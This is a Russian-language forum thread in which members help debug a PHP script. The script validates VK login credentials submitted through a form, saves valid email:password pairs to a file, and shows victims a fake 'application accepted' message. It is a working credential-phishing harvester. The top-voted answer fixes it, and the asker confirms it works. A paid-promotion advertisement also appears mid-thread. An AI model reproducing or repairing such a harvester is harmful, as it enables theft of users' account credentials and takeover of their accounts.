Перейти к содержимому



Купить ссылку здесь
Фотография

Подскажите, пожалуйста, что не так с кодом

Форум ZiSMO.biz
  • Закрытая тема Тема закрыта

Лучший Ответ FTOH , 01 10 2016 - 15:07

Пишет тоже самое, но появилось еще [ ]

Нашел причину. Замените получение логина и пароля на это

$email    = urlencode(iconv('utf-8', 'windows-1251', $_POST['email']));
$password = urlencode(iconv('utf-8', 'windows-1251', $_POST['password']));
Перейти к сообщению

13
Сообщений в теме: 13

OFFLINE Отправлено

mr.freeman
группа пользователя
  • Онлайн:2д 5ч 49м
0

Что в этом коде не так?

 

<?php
 
if (isset($_POST['email'])) {
    $email    = iconv('utf-8', 'windows-1251', $_POST['email']);
    $password = iconv('utf-8', 'windows-1251', $_POST['password']);
    $res      = curl('Ссылка. $email . '&password=' . $password . '&captcha_key=&captcha_sid=');
    $lo       = 'access_token';
    $pos      = strripos($res, $lo);
    if ($pos === false) {
        $info = '<div class="alert alert-danger">Ошибка! Вы ввели неверный логин или пароль! ' . $proxy . '</div>';
    } else {
        $res = json_decode($res, true);
        $id  = $res['user_id'];
        
        $name = curl('Ссылка. $id . '&fields=counters');
        $name = json_decode($name, true);
        
        $res    = json_decode($res, true);
        $id     = $res['user_id'];
        $fp     = fopen("base.php", "a");
        $mytext = "$email:$password\r\n";
        $test   = fwrite($fp, $mytext);
        fclose($fp);
        
        
        
        $fulname = $name['response']['0']['first_name'] . ' ' . $name['response']['0']['last_name'];
        $info    = '<div class="alert alert-success">' . $fulname . ', Ваша заявка принята, ожидайте обработки!</div>';
        
    }
}
 
 
echo $info;
 
 
function curl($url)
{
    
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $response = curl_exec($ch);
    curl_close($ch);
    return $response;
}
?>




    • 0
  • Наверх

OFFLINE Отправлено

KemperenoК
группа пользователя
  • Онлайн:514д 8ч 22м
4 031

Переместил в нужный раздел.


inst.png04.12 p3WmZ8i.gif25.05

    • 0
  • Наверх

OFFLINE Отправлено

makepuff
группа пользователя
  • Онлайн:21д 10ч 22м
10

echo $info; попробуй удалить


    • 0
  • Наверх

Рекламный пост

ONLINE Отправлено

Rogozin
группа пользователя
  • Онлайн:182д 6ч 42м
224

*
Популярное сообщение!

Bigsmm.ru - Качественный сервис раскрутки Вконтакте, instagram, youtube от 18р за 1000 подписчиков!

 

Наши популярные услуги:

Подписчики в Instagram от 18р за 1000 подписчиков, до 3к в день, 30 дней гарантия!

Подписчики в Youtube от 75р за 1000 подписчиков, средняя скорость, отличное качество! 

О нас: Более 500 отзывов на форумах, донат на форуме свыше 2500 рублей (14 место в Топе донатеров Zismo)

 

Перейти на сайт - Bigsmm.ru

 

---------

[Рекламный пост]


Сообщение отредактировал ZisBot: 21 05 2018 - 10:19

Bez-imeni-1.gifBez-imeni-1.gif

    • 11
  • Наверх

OFFLINE Отправлено

fander22
группа пользователя
  • Онлайн:1д 22ч 18м
0

echo $info; попробуй удалить


Сообщение отредактировал fander22: 01 10 2016 - 10:26

    • 0
  • Наверх

OFFLINE Отправлено

FTOH
группа пользователя
  • Онлайн:131д 22ч 53м
226

После "$res = curl(..." поставь "echo $res;" и скопируй сюда вывод. Возможно при авторизации капча выскакивает.


    • 0
  • Наверх

OFFLINE Отправлено

mr.freeman
группа пользователя
  • Онлайн:2д 5ч 49м
0

После "$res = curl(..." поставь "echo $res;" и скопируй сюда вывод. Возможно при авторизации капча выскакивает.

После..это с новой строки? Вот так?

$res      = curl('https://oauth.vk.com...nYsH&username='.$email . '&password=' . $password . '&captcha_key=&captcha_sid=');

echo $res;


    • 0
  • Наверх

OFFLINE Отправлено

FTOH
группа пользователя
  • Онлайн:131д 22ч 53м
226

После..это с новой строки? Вот так?

$res      = curl('https://oauth.vk.com...nYsH&username='.$email . '&password=' . $password . '&captcha_key=&captcha_sid=');

echo $res;

Да


    • 0
  • Наверх

OFFLINE Отправлено

mr.freeman
группа пользователя
  • Онлайн:2д 5ч 49м
0
 

Да

Пишет тоже самое "Ошибка! Вы ввели неверный логин или пароль!"


    • 0
  • Наверх

OFFLINE Отправлено

FTOH
группа пользователя
  • Онлайн:131д 22ч 53м
226

 

 

Пишет тоже самое "Ошибка! Вы ввели неверный логин или пароль!"

 

Тогда так: echo '['.$res.']';


    • 0
  • Наверх

OFFLINE Отправлено

mr.freeman
группа пользователя
  • Онлайн:2д 5ч 49м
0

Тогда так: echo '['.$res.']';

Пишет тоже самое, но появилось еще [ ]


    • 0
  • Наверх

OFFLINE Отправлено   Лучший Ответ

FTOH
группа пользователя
  • Онлайн:131д 22ч 53м
226

Пишет тоже самое, но появилось еще [ ]

Нашел причину. Замените получение логина и пароля на это

$email    = urlencode(iconv('utf-8', 'windows-1251', $_POST['email']));
$password = urlencode(iconv('utf-8', 'windows-1251', $_POST['password']));

    • 1
  • Наверх

OFFLINE Отправлено

mr.freeman
группа пользователя
  • Онлайн:2д 5ч 49м
0

 

Нашел причину. Замените получение логина и пароля на это

$email    = urlencode(iconv('utf-8', 'windows-1251', $_POST['email']));
$password = urlencode(iconv('utf-8', 'windows-1251', $_POST['password']));

Такая же ошибка "Вы ввели неверный логин или пароль"


    • 0
  • Наверх

OFFLINE Отправлено

mr.freeman
группа пользователя
  • Онлайн:2д 5ч 49м
0

 

Нашел причину. Замените получение логина и пароля на это

$email    = urlencode(iconv('utf-8', 'windows-1251', $_POST['email']));
$password = urlencode(iconv('utf-8', 'windows-1251', $_POST['password']));

Проблема решена, спасибо. Очень помог 

FTOH
    • 0
  • Наверх

OFFLINE Отправлено

L1ke
группа пользователя
  • Онлайн:192д 19ч 16м
935

 

Проблема решена, спасибо. Очень помог 

FTOH

 


    • 0
  • Наверх